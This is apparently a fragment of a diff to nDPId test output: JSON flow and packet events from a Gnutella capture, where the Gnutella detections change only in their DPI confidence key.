01403{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1258,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":321,"flow_packet_id":2,"flow_last_seen":95918,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":95918,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBBEAAEAR33a8pcu+CgACD1XrcAkC37R2IDExAvwLw9eirMeJjOQnPkQAAMACAAAGR1RLRwAA0WC9XX1Cv4OMIP5Uj2dxFVfelx8EvKXLvlXrAQAAAAT+NOnnFEdUS0cAAOCbIyHZHrkrYnNgnMXp7j9XkbO8BG2EvGL1g1dTSFIAAPJ8p2NaB+IvDcmOjYwpnv4Dgo0cBBinyTW4skdUS0cAAPLJywhbkrobDN\/JQ6AnuEOyGSGjBLBjsBQYykdUS0cAAPdrnSa2ww\/WjIRLC1ipyWI+KDekBGjurPpb\/FdTSFIAAPUb1vVQWKsuipKs18obx69UnmxtBEftyls+9UdUS0cAAPXAlRBP9j9OpxXVbJllgFo1AUWcBFzZVBBO\/0dUS0cAAPsDRyUcIF2wLlroEqQFEsSbAhy\/BF42QlL4lUdUS0cAAPk7PafFnhokmbg2Skj0CN9dtWlxBGDszQeH6kdUS0cAAP2LxejmjNINBLJfc3hRxQZnhG+dBK23t27qEEdUS0cAAMJCPsbCyFi2EKuhIjR8FOxLMgMMBKSEChnYBkdUS0cAAMs4SkQs8Plx39K+G3osYia2QR5gBLnsyIm8DldTSFIAANEo391sZyCjuFpU0yy2PWYlrl8ABC1Yddsa\/UdUS0cAANCctnuhx+ItXQPhY9ykozj36PhcBGD2nH7bBkdUS0cAANY8nyC9cCseHTJEnvv8hZLF1GA+BEn6s+1RcEdUS0cAAN60b0CUs3pQ36DSdMP3NoNcDa2fBFOgjzCQrEdUS0cAAKZeyrvsa5mvejLQ38QnOIQ2zbdtBGQB54rc7ldTSFIAAKQeYlqSZYffwoHRlw8bFrfmBFSvBFQcNeGvO1dTSFIAAKr7G8iP9T\/W+jUmPMkpEJiqR57KBMvcaRtLPEdUS0cAAK10JPaTOb0hgYkPVi8cpzY7gtJoBFx1+WIan0dUS0cAALNy1PV19iuZm7NzjEzMA6wUOO22BFJALAsFSA=="} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1259,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95923,"flow_last_seen":95923,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95923,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.117.219","src_port":28681,"dst_port":6909,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1259,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":322,"flow_packet_id":1,"flow_last_seen":95923,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95923,"pkt":"UlQAEjUCCAAn5uVZCABFAABtLi4AAIARXRAKAAIPLVh123AJGv0AWeqxHFUxAta++c2ylLcKBb\/ez0QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1259,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95923,"flow_last_seen":95923,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95923,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.117.219","src_port":28681,"dst_port":6909,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1259,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95923,"flow_last_seen":95923,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95923,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.117.219","src_port":28681,"dst_port":6909,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1260,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95923,"flow_last_seen":95923,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95923,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":28681,"dst_port":56070,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1260,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":323,"flow_packet_id":1,"flow_last_seen":95923,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95923,"pkt":"UlQAEjUCCAAn5uVZCABFAABtEcQAAIARHzkKAAIPYPacfnAJ2wYAWfibSFoxAjjwuKgFGYZC9XxYD0QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1260,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95923,"flow_last_seen":95923,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95923,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":28681,"dst_port":56070,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1260,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95923,"flow_last_seen":95923,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95923,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":28681,"dst_port":56070,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1261,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95923,"flow_last_seen":95923,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95923,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.250.179.237","src_port":28681,"dst_port":20848,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1261,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":324,"flow_packet_id":1,"flow_last_seen":95923,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95923,"pkt":"UlQAEjUCCAAn5uVZCABFAABtTeMAAIAR4qYKAAIPSfqz7XAJUXAAWYypWMIxAuib5nRI0KcHRTGrFEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1261,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95923,"flow_last_seen":95923,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95923,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.250.179.237","src_port":28681,"dst_port":20848,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1261,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95923,"flow_last_seen":95923,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95923,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.250.179.237","src_port":28681,"dst_port":20848,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 01403{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1262,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":319,"flow_packet_id":2,"flow_last_seen":95941,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":95941,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBBIAAEARuTykhAoZCgACD9gGcAkC39H3IsUxAlnYy6KYCQUz3Ng+pkQAAMACAAAGR1RLRwAAwkI+xsLIWLYQq6EiNHwU7EsyAwwEpIQKGdgGAQAAAAQMPEZKFEdUS0cAAOCbIyHZHrkrYnNgnMXp7j9XkbO8BG2EvGL1g1dTSFIAAPJ8p2NaB+IvDcmOjYwpnv4Dgo0cBBinyTW4skdUS0cAAPLJywhbkrobDN\/JQ6AnuEOyGSGjBLBjsBQYykdUS0cAAPdrnSa2ww\/WjIRLC1ipyWI+KDekBGjurPpb\/FdTSFIAAPUb1vVQWKsuipKs18obx69UnmxtBEftyls+9UdUS0cAAPXAlRBP9j9OpxXVbJllgFo1AUWcBFzZVBBO\/0dUS0cAAPsDRyUcIF2wLlroEqQFEsSbAhy\/BF42QlL4lUdUS0cAAPk7PafFnhokmbg2Skj0CN9dtWlxBGDszQeH6kdUS0cAAP2LxejmjNINBLJfc3hRxQZnhG+dBK23t27qEEdUS0cAAMs4SkQs8Plx39K+G3osYia2QR5gBLnsyIm8DkdUS0cAANFgvV19Qr+DjCD+VI9ncRVX3pcfBLyly75V61dTSFIAANEo391sZyCjuFpU0yy2PWYlrl8ABC1Yddsa\/UdUS0cAANCctnuhx+ItXQPhY9ykozj36PhcBGD2nH7bBkdUS0cAANY8nyC9cCseHTJEnvv8hZLF1GA+BEn6s+1RcEdUS0cAAN60b0CUs3pQ36DSdMP3NoNcDa2fBFOgjzCQrEdUS0cAAKZeyrvsa5mvejLQ38QnOIQ2zbdtBGQB54rc7ldTSFIAAKQeYlqSZYffwoHRlw8bFrfmBFSvBFQcNeGvO1dTSFIAAKr7G8iP9T\/W+jUmPMkpEJiqR57KBMvcaRtLPEdUS0cAAK10JPaTOb0hgYkPVi8cpzY7gtJoBFx1+WIan0dUS0cAALNy1PV19iuZm7NzjEzMA6wUOO22BFJALAsFSA=="} 01404{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1263,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":318,"flow_packet_id":2,"flow_last_seen":95956,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":95956,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBBMAAEARArOtt7duCgACD+oQcAkC3zGfh5oxAjZAPvXTOccHXf+KmUQAAMACAAAGR1RLRwAA\/YvF6OaM0g0Esl9zeFHFBmeEb50Erbe3buoQAQAAAASYSwA1FEdUS0cAAOCbIyHZHrkrYnNgnMXp7j9XkbO8BG2EvGL1g1dTSFIAAPJ8p2NaB+IvDcmOjYwpnv4Dgo0cBBinyTW4skdUS0cAAPLJywhbkrobDN\/JQ6AnuEOyGSGjBLBjsBQYykdUS0cAAPdrnSa2ww\/WjIRLC1ipyWI+KDekBGjurPpb\/FdTSFIAAPUb1vVQWKsuipKs18obx69UnmxtBEftyls+9UdUS0cAAPXAlRBP9j9OpxXVbJllgFo1AUWcBFzZVBBO\/0dUS0cAAPsDRyUcIF2wLlroEqQFEsSbAhy\/BF42QlL4lUdUS0cAAPk7PafFnhokmbg2Skj0CN9dtWlxBGDszQeH6kdUS0cAAMJCPsbCyFi2EKuhIjR8FOxLMgMMBKSEChnYBkdUS0cAANFgvV19Qr+DjCD+VI9ncRVX3pcfBLyly75V61dTSFIAANEo391sZyCjuFpU0yy2PWYlrl8ABC1Yddsa\/UdUS0cAANCctnuhx+ItXQPhY9ykozj36PhcBGD2nH7bBkdUS0cAANY8nyC9cCseHTJEnvv8hZLF1GA+BEn6s+1RcEdUS0cAAN60b0CUs3pQ36DSdMP3NoNcDa2fBFOgjzCQrEdUS0cAAKZeyrvsa5mvejLQ38QnOIQ2zbdtBGQB54rc7ldTSFIAAKQeYlqSZYffwoHRlw8bFrfmBFSvBFQcNeGvO1dTSFIAAKr7G8iP9T\/W+jUmPMkpEJiqR57KBMvcaRtLPEdUS0cAAK10JPaTOb0hgYkPVi8cpzY7gtJoBFx1+WIan0dUS0cAALNy1PV19iuZm7NzjEzMA6wUOO22BFJALAsFSEdUS0cAALFbZ+HgSIrho0RaGRNTd1qTgMZFBC0fmHBo4w=="} 01404{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1264,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":324,"flow_packet_id":2,"flow_last_seen":96048,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":96048,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBBQAAEARafBJ+rPtCgACD1FwcAkC30eYWMIxAuib5nRI0KcHRTGrFEQAAMACAAAGR1RLRwAA1jyfIL1wKx4dMkSe+\/yFksXUYD4ESfqz7VFwAQAAAASK6DCmFEdUS0cAAOCbIyHZHrkrYnNgnMXp7j9XkbO8BG2EvGL1g1dTSFIAAPJ8p2NaB+IvDcmOjYwpnv4Dgo0cBBinyTW4skdUS0cAAPLJywhbkrobDN\/JQ6AnuEOyGSGjBLBjsBQYykdUS0cAAPdrnSa2ww\/WjIRLC1ipyWI+KDekBGjurPpb\/FdTSFIAAPUb1vVQWKsuipKs18obx69UnmxtBEftyls+9UdUS0cAAPXAlRBP9j9OpxXVbJllgFo1AUWcBFzZVBBO\/0dUS0cAAPsDRyUcIF2wLlroEqQFEsSbAhy\/BF42QlL4lUdUS0cAAPk7PafFnhokmbg2Skj0CN9dtWlxBGDszQeH6kdUS0cAAP2LxejmjNINBLJfc3hRxQZnhG+dBK23t27qEEdUS0cAAMJCPsbCyFi2EKuhIjR8FOxLMgMMBKSEChnYBkdUS0cAAMs4SkQs8Plx39K+G3osYia2QR5gBLnsyIm8DkdUS0cAANFgvV19Qr+DjCD+VI9ncRVX3pcfBLyly75V61dTSFIAANEo391sZyCjuFpU0yy2PWYlrl8ABC1Yddsa\/UdUS0cAANCctnuhx+ItXQPhY9ykozj36PhcBGD2nH7bBkdUS0cAAN60b0CUs3pQ36DSdMP3NoNcDa2fBFOgjzCQrEdUS0cAAKZeyrvsa5mvejLQ38QnOIQ2zbdtBGQB54rc7ldTSFIAAKQeYlqSZYffwoHRlw8bFrfmBFSvBFQcNeGvO1dTSFIAAKr7G8iP9T\/W+jUmPMkpEJiqR57KBMvcaRtLPEdUS0cAAK10JPaTOb0hgYkPVi8cpzY7gtJoBFx1+WIan0dUS0cAALNy1PV19iuZm7NzjEzMA6wUOO22BFJALAsFSA=="} 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1265,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":96049,"flow_last_seen":96049,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":96049,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"83.160.143.48","src_port":28681,"dst_port":37036,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1265,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":325,"flow_packet_id":1,"flow_last_seen":96049,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":96049,"pkt":"UlQAEjUCCAAn5uVZCABFAABtwDYAAIARi2oKAAIPU6CPMHAJkKwAWa9gWsoxAsGbN6aupxEpyf\/jN0QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1265,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":96049,"flow_last_seen":96049,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":96049,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"83.160.143.48","src_port":28681,"dst_port":37036,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1265,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":96049,"flow_last_seen":96049,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":96049,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"83.160.143.48","src_port":28681,"dst_port":37036,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1266,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":96049,"flow_last_seen":96049,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":96049,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"100.1.231.138","src_port":28681,"dst_port":56558,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1266,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":326,"flow_packet_id":1,"flow_last_seen":96049,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":96049,"pkt":"UlQAEjUCCAAn5uVZCABFAABtFDIAAIARzrMKAAIPZAHninAJ3O4AWZFZFoUxAuK7tbNnNS+8oB5EGUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1266,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":96049,"flow_last_seen":96049,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":96049,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"100.1.231.138","src_port":28681,"dst_port":56558,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1266,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":96049,"flow_last_seen":96049,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":96049,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"100.1.231.138","src_port":28681,"dst_port":56558,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1267,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":96049,"flow_last_seen":96049,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":96049,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.28.53.225","src_port":28681,"dst_port":44859,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1267,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":327,"flow_packet_id":1,"flow_last_seen":96049,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":96049,"pkt":"UlQAEjUCCAAn5uVZCABFAABtTdQAAIARVqAKAAIPVBw14XAJrzsAWZ3TvxoxApctlOGi4VjuIFMFmUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1267,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":96049,"flow_last_seen":96049,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":96049,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.28.53.225","src_port":28681,"dst_port":44859,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1267,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":96049,"flow_last_seen":96049,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":96049,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.28.53.225","src_port":28681,"dst_port":44859,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1273,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":301,"flow_packet_id":3,"flow_last_seen":96404,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":96404,"pkt":"UlQAEjUCCAAn5uVZCABFAAA8c1IAAIARylsKAAIPvD00t3AJLkwAKChuYiUKBgACAwMAAAAAAAAAADEBAAkAAABHVEtHCQABAAA="} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1277,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":3,"flow_last_seen":96685,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":96685,"pkt":"UlQAEjUCCAAn5uVZCABFAAA068VAAIAGCcsKAAIPXoaansRp03KjrVDkAAAAAIAC+vDifQAAAgQFtAEDAwgBAQQC"} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1278,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":3,"flow_last_seen":96685,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":96685,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0IMxAAIAG1hsKAAIPY8eUBsRoEPJVbcPeAAAAAIAC+vCBnAAAAgQFtAEDAwgBAQQC"} @@ -1118,17 +1118,17 @@ 